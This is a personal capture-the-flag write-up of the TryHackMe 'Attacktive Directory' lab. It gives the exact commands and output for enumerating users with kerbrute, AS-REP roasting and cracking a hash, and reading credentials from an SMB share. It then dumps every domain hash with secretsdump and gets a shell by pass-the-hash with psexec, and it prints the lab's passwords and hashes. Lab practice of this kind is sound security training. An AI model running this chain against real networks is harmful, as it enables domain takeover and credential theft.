Attacktive Directory ~ Try Hack Me
Finally completed my CEH Master certification and found myself lazing around so here we go :)
I SUCK AT WINDOWS EXPLOITATION ~ Nee
Prerequisite
Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.
echo "10.10.117.127 tar.get" >> /etc/hosts
Okay now onto hacking!
Reconnaissance
As always, I fired off an NMAP scan against the target machine.
┌──(nee㉿kali)-[~] └─$ nmap -Pn -sV -sC -p- -A tar.get
Nmap scan report for tar.get (10.10.117.127) Host is up (0.35s latency). Not shown: 65508 closed ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version | bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: | Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-05 08:45:57Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: THM-AD | NetBIOS_Domain_Name: THM-AD | NetBIOS_Computer_Name: ATTACKTIVEDIREC | DNS_Domain_Name: spookysec.local | DNS_Computer_Name: AttacktiveDirectory.spookysec.local | ProductVersion: 10.0.17763 | System_Time: 2020-10-05T08:48:26+00:00 | ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local | Not valid before: 2020-10-04T08:35:54 |_Not valid after: 2021-04-05T08:35:54 |_ssl-date: 2020-10-05T08:48:41+00:00; 0s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49674/tcp open msrpc Microsoft Windows RPC 49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49676/tcp open msrpc Microsoft Windows RPC 49677/tcp open msrpc Microsoft Windows RPC 49689/tcp open msrpc Microsoft Windows RPC 49697/tcp open msrpc Microsoft Windows RPC 49788/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=10/5%Time=5F7ADD4A%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: | smb2-security-mode: | 2.02: | Message signing enabled and required | smb2-time: | date: 2020-10-05T08:48:27 | start_date: N/A
Most of the open ports and running services led me to believe that this was indeed a windows server.
- DNS
- Active Directory LDAP
- SMB / RPC
- RDP
Bruteforcing credentials
I was given 2 files that aided with the brute force attack.
I made use of a tool named kerbrute to perform the attack
┌──(nee㉿kali)-[~/boxes/thm/attactive] └─$ ./kerbrute_linux_amd64 userenum -d spookysec.local --dc 10.10.156.245 userlist.txt
/ /_ _/ / __ / /__ / /// \/ _/ \/ _/ / / / / \ / ,< / __/ / / // / / / // / // / //||_// /.// \,/__/__/
Version: v1.0.3 (9dad6e1) - 10/06/20 - Ronnie Flathers @ropnop
2020/10/06 04:49:07 > Using KDC(s): 2020/10/06 04:49:07 > 10.10.156.245:88
2020/10/06 04:49:08 > [+] VALID USERNAME: james@spookysec.local 2020/10/06 04:49:14 > [+] VALID USERNAME: svc-admin@spookysec.local 2020/10/06 04:49:22 > [+] VALID USERNAME: James@spookysec.local 2020/10/06 04:49:24 > [+] VALID USERNAME: robin@spookysec.local 2020/10/06 04:49:54 > [+] VALID USERNAME: darkstar@spookysec.local 2020/10/06 04:50:13 > [+] VALID USERNAME: administrator@spookysec.local 2020/10/06 04:50:50 > [+] VALID USERNAME: backup@spookysec.local 2020/10/06 04:51:07 > [+] VALID USERNAME: paradox@spookysec.local 2020/10/06 04:52:58 > [+] VALID USERNAME: JAMES@spookysec.local 2020/10/06 04:53:36 > [+] VALID USERNAME: Robin@spookysec.local
I was able to find out crucial usernames through these attacks. I found out that there were accounts such as:
- svc-admin
- administrator
- backup
I could possibly use one of these accounts to get into the machine.
Exploiting Kerberos
The exploit that was used for this is called ASREPRoasting. I recently learnt about Kerberoasting and it was very similar to this exploit. The only difference between Kerberoasting and ASREPRoasting is that ASREPRoasting occurs when a user account has the privilege Does not require Pre-Authentication set. This technically means that the accounts does not need to provide valid identidication before requesting a kerberos ticket.
I performed this exploit with the use of Impacket. (Impacket/Examples/GetNPUsers.py)
┌──(nee㉿kali)-[~/boxes/thm/attactive] └─$ GetNPUsers.py spookysec.local/svc-admin -no-pass Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for svc-admin $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:80f4807ece8bed030287d392722808dd$148464892db58fe257006835567004e0f3f2a856a4608a1cbce3d858251acfe7c41cf80c1d7ec54b0edad691871910c17564afd893c2cc534e88ab8b6b873e4eee228fcf947ede842452747e0fbdaf55ab1c475cceed283d48ddc5aa604ed8ee8ed8727b3b62f77f634c6e09ff719a53246356edef39f2fb8084b014c1fce8478079a956ce5384d5d1d7121b7173297e8a84e3c4914fd7c6d6618a9221cf3c96280c6ddea7f0ddba1541583bbbfc92b57fc1bd22011a7fd70477c6fd8daccc5d0cd88973a5c0607430e652113642a6de607617dd6866568fcad894ab9364902fd1c7670a7dfa1977ae02d62ff1c2593b35e0
I was presented with the asrep hash for the user account. Moving on, I had to just crack it with john and retrieve the password for that particular account. This is where the wordlist I was given at the begining came in handy!
┌──(nee㉿kali)-[~/boxes/thm/attactive] └─$ sudo john hash.txt --wordlist=passwordlist.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status management2005 ($krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL) 1g 0:00:00:00 DONE (2020-10-06 05:15) 100.0g/s 665600p/s 665600c/s 665600C/s horoscope..amy123 Use the "--show" option to display all of the cracked passwords reliably Session completed
Upon completion I got the password management2005 for the user account svc-admin@spookysec.local
Connecting to shares via admin account
Now that I had both the username and the password I used SMBClient to connect to the file shares that the machine offered.
┌──(nee㉿kali)-[~/boxes/thm/attactive] └─$ smbclient -L spookysec.local -U svc-admin Enter WORKGROUP\svc-admin's password:
Sharename Type Comment
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Now that I had verified that I could access the shares, I tried accessing the backup folder
┌──(nee㉿kali)-[~/boxes/thm/attactive] └─$ smbclient \\10.10.156.245\backup -U svc-admin 1 ⨯ Enter WORKGROUP\svc-admin's password: Try "help" to get a list of possible commands. smb: > ls . D 0 Sat Apr 4 15:08:39 2020 .. D 0 Sat Apr 4 15:08:39 2020 backup_credentials.txt A 48 Sat Apr 4 15:08:53 2020
8247551 blocks of size 4096. 5269051 blocks available smb: >
I was able to successfully connect to the share and noticed a file names backup_credentials.txt. I proceeded to download the file to my local machine and realized that it was base64 encoded.
smb: > get backup_credentials.txt getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) smb: > ^C
┌──(nee㉿kali)-[~/boxes/thm/attactive] └─$ ls 130 ⨯ backup_credentials.txt hash.txt kerbrute_linux_amd64 passwordlist.txt userlist.txt
┌──(nee㉿kali)-[~/boxes/thm/attactive] └─$ cat backup_credentials.txt YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
After decoding it, I realized that I got credentials to the backup account found couple steps ago.
Dumping hashes
Using the credentials I recovered from the previous step, I used Impacket again (but a different module) to dump all user account NTLM hashes & Kerberos keys.
┌──(nee㉿kali)-[~/boxes/thm/attactive] └─$ secretsdump.py spookysec.local/backup:'backup2517860' Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: [Errno Connection error (spookysec.local/backup:backup2517860:445)] [Errno -2] Name or service not known [*] Cleaning up...
┌──(nee㉿kali)-[~/boxes/thm/attactive] └─$ secretsdump.py spookysec.local/backup:'backup2517860'@10.10.156.245 -just-dc Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation
[] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21::: spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4::: spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4::: spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b::: spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e::: spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b::: spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7::: spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a::: spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb::: spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2::: spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705::: spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664::: spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809::: spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538::: ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:8bc3bdcaf0f70c78b7bda16b84032f51::: [] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:c431e7e3555aeb5b63cbdfee3024d56f4b7f10eaba6c3f94d9a1524e76a26a49 Administrator:aes128-cts-hmac-sha1-96:f955ac2d89620b2a8dcd9837105445ff Administrator:des-cbc-md5:6d5edfa173d9d6ae krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902 krbtgt:des-cbc-md5:b94f97e97fabbf5d spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04 spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233 spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5 spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425 spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064 spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112 spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6 spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9 spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510 spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054 spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594 spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499 spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be spookysec.local\darkstar:des-cbc-md5:758af4d061381cea spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067 spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3 spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8 spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64 spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0 spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8 spookysec.local\paradox:des-cbc-md5:83988983f8b34019 spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347 spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86 spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166 spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157 spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518 spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922 spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197 spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89 ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:7403d3da9fbb21788d7ded46cfa217a336d219376bf22d5f4ae0bba232e91f06 ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:1092c7b99ff5efd56ed960531d76647b ATTACKTIVEDIREC$:des-cbc-md5:d69de55e08c4a845 [] Cleaning up...
Accessing administrator account of the machine
Lastly, I made use of psexec to perform something called "passing-the-hash" and get into the admin account.
┌──(nee㉿kali)-[~/boxes/thm/attactive] └─$ psexec.py Administrator@10.10.156.245 -hashes aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation
[] Requesting shares on 10.10.156.245..... [] Found writable share ADMIN$ [] Uploading file xLRsIsYU.exe [] Opening SVCManager on 10.10.156.245..... [] Creating service dfyb on 10.10.156.245..... [] Starting service dfyb..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
And...I'm in.
That's the end of that box 😩. One of my first windows boxes! But turned out to be not too bad I guess :)
